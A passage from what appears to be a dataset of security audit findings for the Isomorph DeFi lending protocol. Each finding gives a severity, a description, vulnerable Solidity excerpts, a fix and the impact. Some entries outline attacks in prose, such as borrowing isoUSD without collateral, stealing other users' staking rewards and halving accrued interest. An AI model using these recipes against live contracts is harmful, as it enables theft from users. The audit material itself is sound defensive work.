proposedLiquidationAmount += \\n (( _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]) \\n *_partialPercentage)/ LOAN_SCALE);\\n } \\n else {\\n proposedLiquidationAmount += _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]);\\n }\\n }\\n }\\n return proposedLiquidationAmount;\\n}\\n```\\n\\n`_calculateProposedReturnedCapital` is used to calculate `proposedLiquidationAmount`. The key difference is that each NFT is priced individually. The result is that the value is truncated up to NFT_LIMIT times. This can lead to `proposedLiquidationAmount` being less than totalUserCollateral even if all user collateral is being liquidated.\\nExample: User A has 2 NFTs. They are valued as follows assuming no truncation: 10.6 and 10.7. When calculating via `totalCollateralValue` they will be summed before they are truncated while in `_calculateProposedReturnedCapital` they will be truncated before they are summed.\\ntotalCollateralValue: 10.6 + 10.7 = 21.3 => 21 (truncated)\\n_calculateProposedReturnedCapital: 10.6 => 10 (truncated) 10.7 => 10 (truncated)\\n10 + 10 = 20\\nAs shown above when using the exact same inputs into our two different functions the final answer is different. In a scenario like this, even though all collateral is taken from the user, their bad debt won't be cleared.ч`_calculateProposedReturnedCapital` should be changed to be similar to `totalCollateralValue`, summing all pooled tokens before pricing:\\n```\\n function _calculateProposedReturnedCapital(\\n address _collateralAddress, \\n CollateralNFTs calldata _loanNFTs, \\n uint256 _partialPercentage\\n ) internal view returns(uint256) {\\n+ IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n+ uint256 totalPooledTokens\\n- uint256 proposedLiquidationAmount;\\n require(_partialPercentage <= LOAN_SCALE, \"partialPercentage greater than 100%\");\\n for(uint256 i = 0; i < NFT_LIMIT; i++){\\n if(_loanNFTs.slots[i] < NFT_LIMIT){\\n if((i == NFT_LIMIT -1) && (_partialPercentage > 0) && (_partialPercentage < LOAN_SCALE) ){\\n //final slot is NFT that will be split if necessary\\n+ totalPooledTokens += ((depositReceipt.pooledTokens(userNFTs.ids[i]) * _partialPercentage) / LOAN_SCALE);\\n- proposedLiquidationAmount += \\n- (( _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]) \\n- *_partialPercentage)/ LOAN_SCALE);\\n } \\n else{\\n+ totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n- proposedLiquidationAmount += _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]);\\n }\\n }\\n }\\n+ return(depositReceipt.priceLiquidity(totalPooledTokens));\\n- return proposedLiquidationAmount;\\n }\\n```\\nчBad debt will not be cleared in some liquidation scenariosч```\\n uint256 totalUserCollateral = totalCollateralValue(_collateralAddress, _loanHolder);\\n uint256 proposedLiquidationAmount;\\n { //scope block for liquidationAmount due to stack too deep\\n uint256 liquidationAmount = viewLiquidatableAmount(totalUserCollateral, 1 ether, isoUSDBorrowed, liquidatableMargin);\\n require(liquidationAmount > 0 , \"Loan not liquidatable\");\\n proposedLiquidationAmount = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n require(proposedLiquidationAmount <= liquidationAmount, \"excessive liquidation suggested\");\\n }\\n uint256 isoUSDreturning = proposedLiquidationAmount*LIQUIDATION_RETURN/LOAN_SCALE;\\n if(proposedLiquidationAmount >= totalUserCollateral){\\n //@audit bad debt cleared here\\n }\\n```\\n -priceLiquidity() may not work if PriceFeed.aggregator() is updatedчmediumчpriceLiquidity() may not work if PriceFeed.aggregator() is updated\\nIn the constructor of the DepositReceipt_* contract, the value of minAnswer/maxAnswer in priceFeed.aggregator() is obtained and assigned to *MinPrice/*MaxPrice as the maximum/minimum price limit when calling the getOraclePrice function in priceLiquidity, and *MinPrice/*MaxPrice can not change.\\n```\\n IAccessControlledOffchainAggregator aggregator = IAccessControlledOffchainAggregator(priceFeed.aggregator());\\n //fetch the pricefeeds hard limits so we can be aware if these have been reached.\\n tokenMinPrice = aggregator.minAnswer();\\n tokenMaxPrice = aggregator.maxAnswer();\\n// rest of code\\n uint256 oraclePrice = getOraclePrice(priceFeed, tokenMaxPrice, tokenMinPrice);\\n// rest of code\\n function getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, \"Negative Oracle Price\");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , \"Stale pricefeed\");\\n require(signedPrice < _maxPrice, \"Upper price bound breached\");\\n require(signedPrice > _minPrice, \"Lower price bound breached\");\\n```\\n\\nBut in the priceFeed contract, the address of the aggregator can be changed by the owner, which may cause the value of minAnswer/maxAnswer to change, and the price limit in the DepositReceipt_* contract to be invalid, and priceLiquidity() can not work.\\n```\\n function confirmAggregator(address _aggregator)\\n external\\n onlyOwner()\\n {\\n require(_aggregator == address(proposedAggregator), \"Invalid proposed aggregator\");\\n delete proposedAggregator;\\n setAggregator(_aggregator);\\n }\\n\\n\\n /*\\n * Internal\\n */\\n\\n function setAggregator(address _aggregator)\\n internal\\n {\\n uint16 id = currentPhase.id + 1;\\n currentPhase = Phase(id, AggregatorV2V3Interface(_aggregator));\\n phaseAggregators[id] = AggregatorV2V3Interface(_aggregator);\\n }\\n // rest of code\\n function aggregator()\\n external\\n view\\n returns (address)\\n {\\n return address(currentPhase.aggregator);\\n }\\n```\\nчConsider getting latest priceFeed.aggregator().minAnswer()/maxAnswer() in priceLiquidity()чч```\\n IAccessControlledOffchainAggregator aggregator = IAccessControlledOffchainAggregator(priceFeed.aggregator());\\n //fetch the pricefeeds hard limits so we can be aware if these have been reached.\\n tokenMinPrice = aggregator.minAnswer();\\n tokenMaxPrice = aggregator.maxAnswer();\\n// rest of code\\n uint256 oraclePrice = getOraclePrice(priceFeed, tokenMaxPrice, tokenMinPrice);\\n// rest of code\\n function getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, \"Negative Oracle Price\");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , \"Stale pricefeed\");\\n require(signedPrice < _maxPrice, \"Upper price bound breached\");\\n require(signedPrice > _minPrice, \"Lower price bound breached\");\\n```\\n -Vault_Synths.sol code does not consider protocol exchange fee when evaluating the Collateral worthчmediumчVault_Synths.sol code does not consider protocol fee.\\nIf we look into the good-written documentation:\\nI want to quote:\\nBecause the withdrawalFee of a lyra LP pool can vary we must fetch it each time it is needed to ensure we use an accurate value. LP tokens are devalued by this as a safety measure as any liquidation would include selling the collateral and so should factor in that cost to ensure it is profitable.\\nIn Vault_Lyra.sol, when calculating the collateral of the LP token, the fee is taken into consideration.\\n```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice(); \\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee \\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n\\nThis is not the case for Vault_Synths.sol, the underlying token also charge exchange fee, but this fee is not reflected when evaluating the Collateral worth.\\nExchange fees are generated whenever a user exchanges one synthetic asset (Synth) for another through Synthetix.Exchange. Fees are typically between 10-100 bps (0.1%-1%), though usually 30 bps, and when generated are sent to the fee pool, where it is available to be claimed proportionally by SNX stakers each week.\\nwe can see that the sETH token charges 0.25%, the sBTC token charges 0.25%, the sUSD charges 0% fee, but this does not ensure this fee rate will not change in the future.чWe recommend the project consider protocol exchange fee when evaluating the Collateral worth in Vault_Synths.sol\\nPrecisely when the exchange fee is updated, the fee is reflected in the collateral worth.\\n```\\n function setExchangeFeeRateForSynths(bytes32[] calldata synthKeys, uint256[] calldata exchangeFeeRates)\\n external\\n onlyOwner\\n {\\n flexibleStorage().setExchangeFeeRateForSynths(SETTING_EXCHANGE_FEE_RATE, synthKeys, exchangeFeeRates);\\n for (uint i = 0; i < synthKeys.length; i++) {\\n emit ExchangeFeeUpdated(synthKeys[i], exchangeFeeRates[i]);\\n }\\n }\\n\\n /// @notice Set exchange dynamic fee threshold constant in decimal ratio\\n /// @param threshold The exchange dynamic fee threshold\\n /// @return uint threshold constant\\n function setExchangeDynamicFeeThreshold(uint threshold) external onlyOwner {\\n require(threshold != 0, \"Threshold cannot be 0\");\\n\\n flexibleStorage().setUIntValue(SETTING_CONTRACT_NAME, SETTING_EXCHANGE_DYNAMIC_FEE_THRESHOLD, threshold);\\n\\n emit ExchangeDynamicFeeThresholdUpdated(threshold);\\n }\\n```\\nчThe collateral may be overvalued because the exchange does not count when evaluating the Collateral worth and result in bad debt which makes the project insolvent.ч```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice(); \\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee \\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n -User is unable to partially payback loan if they aren't able to post enough isoUSD to bring them back to minOpeningMarginчhighчThe only way for a user to reduce their debt is to call closeLoan. If the amount repaid does not bring the user back above minOpeningMargin then the transaction will revert. This is problematic for users that wish to repay their debt but don't have enough to get back to minOpeningMargin as it could lead to unfair liquidations.\\n```\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , \"Remaining debt fails to meet minimum margin!\");\\n }\\n```\\n\\nThe checks above are done when a user calls closeLoan. This ensures that the user's margin is back above minOpeningMargin before allowing them to remove any collateral. This is done as a safeguard to block loans users from effectively opening loans at lower than desired margin. This has the unintended consequence that as user cannot pay off any of their loan if they do not increase their loan back above minOpeningMargin. This could prevent users from being able to save a loan that is close to liquidation causing them to get liquidated when they otherwise would have paid off their loan.чI recommend adding a separate function that allows users to pay off their loan without removing any collateral:\\n```\\nfunction paybackLoan(\\n address _collateralAddress,\\n uint256 _USDToVault\\n ) external override whenNotPaused \\n {\\n _collateralExists(_collateralAddress);\\n _closeLoanChecks(_collateralAddress, 0, _USDToVault);\\n //make sure virtual price is related to current time before fetching collateral details\\n //slither-disable-next-line reentrancy-vulnerabilities-1\\n _updateVirtualPrice(block.timestamp, _collateralAddress);\\n ( \\n bytes32 currencyKey,\\n uint256 minOpeningMargin,\\n ,\\n ,\\n ,\\n uint256 virtualPrice,\\n \\n ) = _getCollateral(_collateralAddress);\\n //check for frozen or paused collateral\\n _checkIfCollateralIsActive(currencyKey);\\n\\n uint256 isoUSDdebt = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n require( isoUSDdebt >= _USDToVault, \"Trying to return more isoUSD than borrowed!\");\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n\\n uint256 collateral = collateralPosted[_collateralAddress][msg.sender];\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateral); \\n uint256 borrowMargin = (outstandingisoUSD * liquidatableMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , \"Liquidation margin not met!\");\\n \\n //record paying off loan principle before interest\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 interestPaid;\\n uint256 loanPrinciple = isoUSDLoaned[_collateralAddress][msg.sender];\\n if( loanPrinciple >= _USDToVault){\\n //pay off loan principle first\\n isoUSDLoaned[_collateralAddress][msg.sender] = loanPrinciple - _USDToVault;\\n }\\n else{\\n interestPaid = _USDToVault - loanPrinciple;\\n //loan principle is fully repaid so record this.\\n isoUSDLoaned[_collateralAddress][msg.sender] = 0;\\n }\\n //update mappings with reduced amounts\\n isoUSDLoanAndInterest[_collateralAddress][msg.sender] = isoUSDLoanAndInterest[_collateralAddress][msg.sender] - ((_USDToVault * LOAN_SCALE) / virtualPrice);\\n emit ClosedLoan(msg.sender, _USDToVault, currencyKey, 0);\\n //Now all effects are handled, transfer the assets so we follow CEI pattern\\n _decreaseLoan(_collateralAddress, 0, _USDToVault, interestPaid);\\n}\\n```\\nчUser is unable to make partial repayments if their payment does not increase margin enoughч```\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , \"Remaining debt fails to meet minimum margin!\");\\n }\\n```\\n -The calculation of ````totalUSDborrowed```` in ````openLoan()```` is not correctчhighчThe `openLoan()` function wrongly use `isoUSDLoaned` to calculate `totalUSDborrowed`. Attacker can exploit it to bypass security check and loan isoUSD with no enough collateral.\\nvulnerability point\\n```\\nfunction openLoan(\\n // // rest of code\\n ) external override whenNotPaused \\n {\\n //// rest of code\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, _colAmount\\n + collateralPosted[_collateralAddress][msg.sender]);\\n uint256 totalUSDborrowed = _USDborrowed \\n + (isoUSDLoaned[_collateralAddress][msg.sender] * virtualPrice)/LOAN_SCALE;\\n // @audit should be isoUSDLoanAndInterest[_collateralAddress][msg.sender]\\n require(totalUSDborrowed >= ONE_HUNDRED_DOLLARS, \"Loan Requested too small\");\\n uint256 borrowMargin = (totalUSDborrowed * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD >= borrowMargin, \"Minimum margin not met!\");\\n\\n // // rest of code\\n}\\n```\\n\\nAttack example: <1>Attacker normally loans and produces 10000 isoUSD interest <2>Attacker repays principle but left interest <3>Attacker open a new 10000 isoUSD loan without providing collateralчSee Vulnerability DetailчAttacker can loan isoUSD with no enough collateral.ч```\\nfunction openLoan(\\n // // rest of code\\n ) external override whenNotPaused \\n {\\n //// rest of code\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, _colAmount\\n + collateralPosted[_collateralAddress][msg.sender]);\\n uint256 totalUSDborrowed = _USDborrowed \\n + (isoUSDLoaned[_collateralAddress][msg.sender] * virtualPrice)/LOAN_SCALE;\\n // @audit should be isoUSDLoanAndInterest[_collateralAddress][msg.sender]\\n require(totalUSDborrowed >= ONE_HUNDRED_DOLLARS, \"Loan Requested too small\");\\n uint256 borrowMargin = (totalUSDborrowed * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD >= borrowMargin, \"Minimum margin not met!\");\\n\\n // // rest of code\\n}\\n```\\n -User can steal rewards from other users by withdrawing their Velo Deposit NFTs from other users' depositorsчhighчRewards from staking AMM tokens accumulate to the depositor used to deposit them. The rewards accumulated by a depositor are passed to the owner when they claim. A malicious user to steal the rewards from other users by manipulating other users depositors. Since any NFT of a DepositReceipt can be withdrawn from any depositor with the same DepositReceipt, a malicious user could mint an NFT on their depositor then withdraw in from another user's depositor. The net effect is that that the victims deposits will effectively be in the attackers depositor and they will collect all the rewards.\\n```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n\\nEvery user must create a `Depositor` using `Templater` to interact with vaults and take loans. `Depositor#withdrawFromGauge` allows any user to withdraw any NFT that was minted by the same `DepositReciept`. This is where the issues arises. Since rewards are accumulated to the `Depositor` in which the underlying is staked a user can deposit to their `Depositor` then withdraw their NFT through the `Depositor` of another user's `Depositor` that uses the same `DepositReciept`. The effect is that the tokens will remained staked to the attackers `Depositor` allowing them to steal all the other user's rewards.\\nExample: `User A` and `User B` both create a `Depositor` for the same `DepositReciept`. Both users deposit 100 tokens into their respective `Depositors`. `User B` now calls `withdrawFromGauge` on `Depositor` A. `User B` gets their 100 tokens back and `Depositor B` still has 100 tokens deposited in it. `User B` cannot steal these tokens but they are now collecting the yield on all 100 tokens via `Depositor B` and `User A` isn't getting any rewards at all because `Depositor` A no longer has any tokens deposited into Velodrome gauge.чDepositors should only be able to burn NFTs that they minted. Change DepositReciept_Base#burn to enforce this:\\n```\\n function burn(uint256 _NFTId) external onlyMinter{\\n+ //tokens must be burned by the depositor that minted them\\n+ address depositor = relatedDepositor[_NFTId];\\n+ require(depositor == msg.sender, \"Wrong depositor\");\\n require(_isApprovedOrOwner(msg.sender, _NFTId), \"ERC721: caller is not token owner or approved\");\\n delete pooledTokens[_NFTId];\\n delete relatedDepositor[_NFTId];\\n _burn(_NFTId);\\n }\\n```\\nчMalicious user can steal other user's rewardsч```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n -Vault_Base_ERC20#_updateVirtualPrice calculates interest incorrectly if updated frequentlyчmediumчUpdating the virtual price of an asset happens in discrete increments of 3 minutes. This is done to reduce the chance of DOS loops. The issue is that it updates the time to an incorrect timestamp. It should update to the truncated 3 minute interval but instead updates to the current timestamp. The result is that the interest calculation can be abused to lower effective interest rate.\\n```\\nfunction _updateVirtualPrice(uint256 _currentBlockTime, address _collateralAddress) internal { \\n ( ,\\n ,\\n ,\\n uint256 interestPer3Min,\\n uint256 lastUpdateTime,\\n uint256 virtualPrice,\\n\\n ) = _getCollateral(_collateralAddress);\\n uint256 timeDelta = _currentBlockTime - lastUpdateTime;\\n //exit gracefully if two users call the function for the same collateral in the same 3min period\\n //@audit increments \\n uint256 threeMinuteDelta = timeDelta / 180; \\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n}\\n```\\n\\n_updateVirtualPrice is used to update the interest calculations for the specified collateral and is always called with block.timestamp. Due to truncation threeMinuteDelta is always rounded down, that is if there has been 1.99 3-minute intervals it will truncate to 1. The issue is that in the collateralBook#vaultUpdateVirtualPriceAndTime subcall the time is updated to block.timestamp (_currentBlockTime).\\nExample: lastUpdateTime = 1000 and block.timestamp (_currentBlockTime) = 1359.\\ntimeDelta = 1359 - 1000 = 359\\nthreeMinuteDelta = 359 / 180 = 1\\nThis updates the interest by only as single increment but pushes the new time forward 359 seconds. When called again it will use 1359 as lastUpdateTime which means that 179 seconds worth of interest have been permanently lost. Users with large loan positions could abuse this to effectively halve their interest accumulation. Given how cheap optimism transactions are it is highly likely this could be exploited profitably with a bot.чBefore updating the interest time it should first truncate it to the closest 3-minute interval:\\n```\\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n+ _currentBlockTime = (_currentBlockTime / 180) * 180;\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n```\\nчInterest calculations will be incorrect if they are updated frequently, which can be abused by users with large amounts of debt to halve their accumulated interestч```\\nfunction _updateVirtualPrice(uint256 _currentBlockTime, address _collateralAddress) internal { \\n ( ,\\n ,\\n ,\\n uint256 interestPer3Min,\\n uint256 lastUpdateTime,\\n uint256 virtualPrice,\\n\\n ) = _getCollateral(_collateralAddress);\\n uint256 timeDelta = _currentBlockTime - lastUpdateTime;\\n //exit gracefully if two users call the function for the same collateral in the same 3min period\\n //@audit increments \\n uint256 threeMinuteDelta = timeDelta / 180; \\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n}\\n```\\n -All collateral in Velodrome vault will be permantly locked if either asset in liquidity pair stays outside of min/max priceчmediumчThe oracles used have a built in safeguard to revert the transaction if the queried asset is outside of a defined price range. The issue with this is that every vault interaction requires the underlying collateral to be valued. If one of the assets in the pair goes outside it's immutable range then the entire vault will be frozen and all collateral will be permanently stuck.\\n```\\nfunction getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, \"Negative Oracle Price\");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , \"Stale pricefeed\");\\n\\n //@audit revert if price is outside of immutable bounds\\n require(signedPrice < _maxPrice, \"Upper price bound breached\");\\n require(signedPrice > _minPrice, \"Lower price bound breached\");\\n uint256 price = uint256(signedPrice);\\n return price;\\n}\\n```\\n\\nThe lines above are called each time and asset is priced. If the oracle returns outside of the predefined range then the transaction will revert.\\n```\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n //@audit contract prices withdraw collateral\\n uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore debts less than $0.001\\n uint256 collateralLeft = totalCollateralValue(_collateralAddress, msg.sender) - colInUSD;\\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(collateralLeft > borrowMargin , \"Remaining debt fails to meet minimum margin!\");\\n }\\n```\\n\\nWhen closing a loan the vault attempts to price the users collateral. Since this is the only way for a user to remove collateral is to call closeLoan, if the price of either asset in the LP goes outside of its bounds then all user deposits will be lost.чIf a user is closing their entire loan then there is no need to check the value of the withdraw collateral because there is no longer any debt to collateralize. Move the check inside the inequality to allow the closeLoan to always function:\\n```\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n- uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n+ uint256 colInUSD;\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore debts less than $0.001\\n+ uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n uint256 collateralLeft = totalCollateralValue(_collateralAddress, msg.sender) - colInUSD;\\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(collateralLeft > borrowMargin , \"Remaining debt fails to meet minimum margin!\");\\n }\\n```\\nчEntire vault will be frozen and all collateral will be permanently stuckч```\\nfunction getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, \"Negative Oracle Price\");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , \"Stale pricefeed\");\\n\\n //@audit revert if price is outside of immutable bounds\\n require(signedPrice < _maxPrice, \"Upper price bound breached\");\\n require(signedPrice > _minPrice, \"Lower price bound breached\");\\n uint256 price = uint256(signedPrice);\\n return price;\\n}\\n```\\n -Outstanding loans cannot be closed or liquidated if collateral is pausedчhighчWhen a collateral is paused by governance, `collateralValid` is set to false. This causes closing and liquidating of loans to be impossible, leading to two issues. The first is that users with exist loans are unable to close their loans to recover their collateral. The second is that since debt is impossible to liquidate the protocol could end up being stuck with a lot of bad debt.\\n```\\nfunction pauseCollateralType(\\n address _collateralAddress,\\n bytes32 _currencyKey\\n ) external collateralExists(_collateralAddress) onlyAdmin {\\n require(_collateralAddress != address(0)); //this should get caught by the collateralExists check but just to be careful\\n //checks two inputs to help prevent input mistakes\\n require( _currencyKey == collateralProps[_collateralAddress].currencyKey, \"Mismatched data\");\\n collateralValid[_collateralAddress] = false;\\n collateralPaused[_collateralAddress] = true;\\n}\\n```\\n\\nWhen a collateral is paused `collateralValid[_collateralAddress]` is set to `false`. For `Vault_Lyra` `Vault_Synths` and `Vault_Velo` this will cause `closeLoan` and `callLiquidation` to revert. This traps existing users and prevents liquidations which will result in bad debt for the protocolчAllow liquidations and loan closure when collateral is pausedчOutstanding loans cannot be closed or liquidated, freezing user funds and causing the protocol to take on bad debtч```\\nfunction pauseCollateralType(\\n address _collateralAddress,\\n bytes32 _currencyKey\\n ) external collateralExists(_collateralAddress) onlyAdmin {\\n require(_collateralAddress != address(0)); //this should get caught by the collateralExists check but just to be careful\\n //checks two inputs to help prevent input mistakes\\n require( _currencyKey == collateralProps[_collateralAddress].currencyKey, \"Mismatched data\");\\n collateralValid[_collateralAddress] = false;\\n collateralPaused[_collateralAddress] = true;\\n}\\n```\\n -increaseCollateralAmount : User is not allowed to increase collateral freely.чmediumчFor all the tree type of vault, a user is allowed to increase collateral only if the overall collateral value is higher than the margin value.\\nimo, this restriction may not be needed. anyway user is adding the collateral that could eventually save from liquidation.\\nProtocol will loose advantage due to this restriction.\\nCodes from lyra vault implementation :\\nLine 184\\n```\\n require(colInUSD >= borrowMargin, \"Liquidation margin not met!\");\\n```\\n\\nFor synth - Refer here\\nFor velo - Refer hereчAllow user add collateral freely.чUser may not have the collateral all at once, but they can add like an EMI.\\nProtocol will loose the repayment anyway.\\nWhat is no one comes for liquidation - again this could lose.ч```\\n require(colInUSD >= borrowMargin, \"Liquidation margin not met!\");\\n```\\n -Dangerous assumption on the peg of USDC can lead to manipulationsчmediumчDangerous assumption on the peg of USDC can lead to manipulations\\nThe volatility of USDC will also affect the price of the other token in the pool since it's priced in USDC (DepositReceipt_USDC.sol#L87, DepositReceipt_USDC.sol#L110) and then compared to its USD price from a Chainlink oracle (DepositReceipt_USDC.sol#L90-L98).\\nThis issue is also applicable to the hard coded peg of sUSD when evaluating the USD price of a Synthetix collateral (Vault_Synths.sol#L76):\\n```\\n/// @return returns the value of the given synth in sUSD which is assumed to be pegged at $1.\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //As it is a synth use synthetix for pricing\\n return (synthetixExchangeRates.effectiveValue(_currencyKey, _amount, SUSD_CODE)); \\n}\\n```\\n\\nTogether with isoUSD not having a stability mechanism, these assumptions can lead to different manipulations with the price of isoUSD and the arbitraging opportunities created by the hard peg assumptions (sUSD and USDC will be priced differently on exchanges and on Isomorph).чConsider using the Chainlink USDC/USD feed to get the price of USDC and price liquidity using the actual price of USDC. Also, consider converting sUSD prices of Synthetix collaterals to USD to mitigate the discrepancy in prices between external exchanges and Isomorph.чIf the price of USDC falls below $1, collateral will be priced higher than expected. This will keep borrowers from being liquidated. And it will probably affect the price of isoUSD since there will be an arbitrage opportunity: the cheaper USDC will be priced higher as collateral on Isomorph. If hte price of USDC raises above $1, borrowers' collateral will be undervalued and some liquidations will be possible that wouldn't have be allowed if the actual price of USDC was used.ч```\\n/// @return returns the value of the given synth in sUSD which is assumed to be pegged at $1.\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //As it is a synth use synthetix for pricing\\n return (synthetixExchangeRates.effectiveValue(_currencyKey, _amount, SUSD_CODE)); \\n}\\n```\\n -Wrong constants for time delayчmediumчThis protocol uses several constants for time dealy and some of them are incorrect.\\nIn `isoUSDToken.sol`, `ISOUSD_TIME_DELAY` should be `3 days` instead of 3 seconds.\\n```\\n uint256 constant ISOUSD_TIME_DELAY = 3; // days;\\n```\\n\\nIn `CollateralBook.sol`, `CHANGE_COLLATERAL_DELAY` should be `2 days` instead of 200 seconds.\\n```\\n uint256 public constant CHANGE_COLLATERAL_DELAY = 200; //2 days\\n```\\nч2 constants should be modified as mentioned 